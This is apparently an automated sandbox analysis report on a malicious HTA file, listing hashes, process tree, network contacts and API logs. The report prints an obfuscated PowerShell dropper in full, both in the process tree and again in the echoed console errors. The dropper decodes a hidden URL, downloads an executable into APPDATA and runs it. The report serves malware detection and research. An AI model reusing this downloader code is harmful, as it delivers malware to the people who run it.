Summary | ZeroBOX

098.hta

Generic Malware Antivirus PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us May 9, 2023, 6:42 p.m. May 9, 2023, 6:44 p.m.
Size 48.2KB
Type HTML document, ASCII text, with very long lines
MD5 246b0b1de71eeffbb03fa02ccf9c0621
SHA256 e9f9c78a479d056fa9514f918e816d028e6dc7cc578f2c24703e698732f057fa
CRC32 75C06DAB
ssdeep 1536:MZdhmegJ4G5SddWeu+xdXqj+9S+XdXqqCYCCXx7PXl+d7Hx/7/1q/7+X3nYg+GHz:8f4SddkfwS/VvIWdn
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\098.hta

    1664
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function pYSLE($V, $Q){[IO.File]::WriteAllBytes($V, $Q)};function cdKJpBF($V){if($V.EndsWith((XYgDFbuR @(40107,40161,40169,40169))) -eq $True){Start-Process (XYgDFbuR @(40175,40178,40171,40161,40169,40169,40112,40111,40107,40162,40181,40162)) $V}else{Start-Process $V}};function CNyWMYuz($Xt){$JI = New-Object (XYgDFbuR @(40139,40162,40177,40107,40148,40162,40159,40128,40169,40166,40162,40171,40177));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Q = $JI.DownloadData($Xt);return $Q};function XYgDFbuR($TO){$eF=40061;$VN=$Null;foreach($HA in $TO){$VN+=[char]($HA-$eF)};return $VN};function YuPMhMlF(){$fEikKtIVl = $env:APPDATA + '\';$LDTlYDCLf = CNyWMYuz (XYgDFbuR @(40165,40177,40177,40173,40176,40119,40108,40108,40160,40175,40182,40176,40177,40158,40169,40177,40162,40158,40107,40166,40171,40108,40160,40165,40166,40171,40108,40109,40118,40117,40107,40162,40181,40162));$StIlhBZc = $fEikKtIVl + '098.exe';pYSLE $StIlhBZc $LDTlYDCLf;cdKJpBF $StIlhBZc;;;;}YuPMhMlF;

      2144

Name Response Post-Analysis Lookup
crystaltea.in 192.185.110.133
IP Address Status Action
164.124.101.2 Active Moloch
192.185.110.133 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:430
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function pYSLE($V, $Q){[IO.File]::WriteAllBytes($V, $Q)};function cdKJpBF($V)
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: {if($V.EndsWith((XYgDFbuR @(40107,40161,40169,40169))) -eq $True){Start-Process
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: (XYgDFbuR @(40175,40178,40171,40161,40169,40169,40112,40111,40107,40162,40181,
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: 40162)) $V}else{Start-Process $V}};function CNyWMYuz($Xt){$JI = New-Object (XYg
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: DFbuR @(40139,40162,40177,40107,40148,40162,40159,40128,40169,40166,40162,40171
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: ,40177));[Net.ServicePointManager]:: <<<< SecurityProtocol = [Net.SecurityProto
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: colType]::TLS12;$Q = $JI.DownloadData($Xt);return $Q};function XYgDFbuR($TO){$e
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: F=40061;$VN=$Null;foreach($HA in $TO){$VN+=[char]($HA-$eF)};return $VN};functio
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: n YuPMhMlF(){$fEikKtIVl = $env:APPDATA + '\';$LDTlYDCLf = CNyWMYuz (XYgDFbuR @(
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: 108,40109,40118,40117,40107,40162,40181,40162));$StIlhBZc = $fEikKtIVl + '098.e
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: xe';pYSLE $StIlhBZc $LDTlYDCLf;cdKJpBF $StIlhBZc;;;;}YuPMhMlF;
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: on was closed: An unexpected error occurred on a send."
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: At line:1 char:504
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: + function pYSLE($V, $Q){[IO.File]::WriteAllBytes($V, $Q)};function cdKJpBF($V)
console_handle: 0x0000014b
1 1 0

WriteConsoleW

buffer: {if($V.EndsWith((XYgDFbuR @(40107,40161,40169,40169))) -eq $True){Start-Process
console_handle: 0x00000157
1 1 0

WriteConsoleW

buffer: (XYgDFbuR @(40175,40178,40171,40161,40169,40169,40112,40111,40107,40162,40181,
console_handle: 0x00000163
1 1 0

WriteConsoleW

buffer: 40162)) $V}else{Start-Process $V}};function CNyWMYuz($Xt){$JI = New-Object (XYg
console_handle: 0x0000016f
1 1 0

WriteConsoleW

buffer: DFbuR @(40139,40162,40177,40107,40148,40162,40159,40128,40169,40166,40162,40171
console_handle: 0x0000017b
1 1 0

WriteConsoleW

buffer: ,40177));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolTyp
console_handle: 0x00000187
1 1 0

WriteConsoleW

buffer: e]::TLS12;$Q = $JI.DownloadData <<<< ($Xt);return $Q};function XYgDFbuR($TO){$e
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: F=40061;$VN=$Null;foreach($HA in $TO){$VN+=[char]($HA-$eF)};return $VN};functio
console_handle: 0x0000019f
1 1 0

WriteConsoleW

buffer: n YuPMhMlF(){$fEikKtIVl = $env:APPDATA + '\';$LDTlYDCLf = CNyWMYuz (XYgDFbuR @(
console_handle: 0x000001ab
1 1 0

WriteConsoleW

buffer: 108,40109,40118,40117,40107,40162,40181,40162));$StIlhBZc = $fEikKtIVl + '098.e
console_handle: 0x000001cf
1 1 0

WriteConsoleW

buffer: xe';pYSLE $StIlhBZc $LDTlYDCLf;cdKJpBF $StIlhBZc;;;;}YuPMhMlF;
console_handle: 0x000001db
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001e7
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001f3
1 1 0

WriteConsoleW

buffer: Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null.
console_handle: 0x00000213
1 1 0

WriteConsoleW

buffer: Parameter name: bytes"
console_handle: 0x0000021f
1 1 0

WriteConsoleW

buffer: At line:1 char:48
console_handle: 0x0000022b
1 1 0

WriteConsoleW

buffer: + function pYSLE($V, $Q){[IO.File]::WriteAllBytes <<<< ($V, $Q)};function cdKJp
console_handle: 0x00000237
1 1 0

WriteConsoleW

buffer: BF($V){if($V.EndsWith((XYgDFbuR @(40107,40161,40169,40169))) -eq $True){Start-P
console_handle: 0x00000243
1 1 0

WriteConsoleW

buffer: rocess (XYgDFbuR @(40175,40178,40171,40161,40169,40169,40112,40111,40107,40162,
console_handle: 0x0000024f
1 1 0

WriteConsoleW

buffer: 40181,40162)) $V}else{Start-Process $V}};function CNyWMYuz($Xt){$JI = New-Objec
console_handle: 0x0000025b
1 1 0

WriteConsoleW

buffer: t (XYgDFbuR @(40139,40162,40177,40107,40148,40162,40159,40128,40169,40166,40162
console_handle: 0x00000267
1 1 0

WriteConsoleW

buffer: ,40171,40177));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProto
console_handle: 0x00000273
1 1 0

WriteConsoleW

buffer: colType]::TLS12;$Q = $JI.DownloadData($Xt);return $Q};function XYgDFbuR($TO){$e
console_handle: 0x0000027f
1 1 0

WriteConsoleW

buffer: F=40061;$VN=$Null;foreach($HA in $TO){$VN+=[char]($HA-$eF)};return $VN};functio
console_handle: 0x0000028b
1 1 0

WriteConsoleW

buffer: n YuPMhMlF(){$fEikKtIVl = $env:APPDATA + '\';$LDTlYDCLf = CNyWMYuz (XYgDFbuR @(
console_handle: 0x00000297
1 1 0

WriteConsoleW

buffer: 108,40109,40118,40117,40107,40162,40181,40162));$StIlhBZc = $fEikKtIVl + '098.e
console_handle: 0x000002bb
1 1 0

WriteConsoleW

buffer: xe';pYSLE $StIlhBZc $LDTlYDCLf;cdKJpBF $StIlhBZc;;;;}YuPMhMlF;
console_handle: 0x000002c7
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000002d3
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000002df
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4068
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4068
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4068
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4068
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4068
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4068
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3d68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3d68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3d68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c41a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3d68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3d68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3d68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3d68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3d68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3d68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c3d68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c4268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c42e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c42e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c42e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c42e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c42e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c42e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c42e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c42e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c38a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c38a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c38a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c38a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 1966080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02610000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x719b1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x719b2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02512000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02522000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0254a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02523000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02524000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02597000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02542000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02595000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02525000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0254c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02526000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02543000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02544000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02545000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02546000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02547000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02548000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02549000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ed000
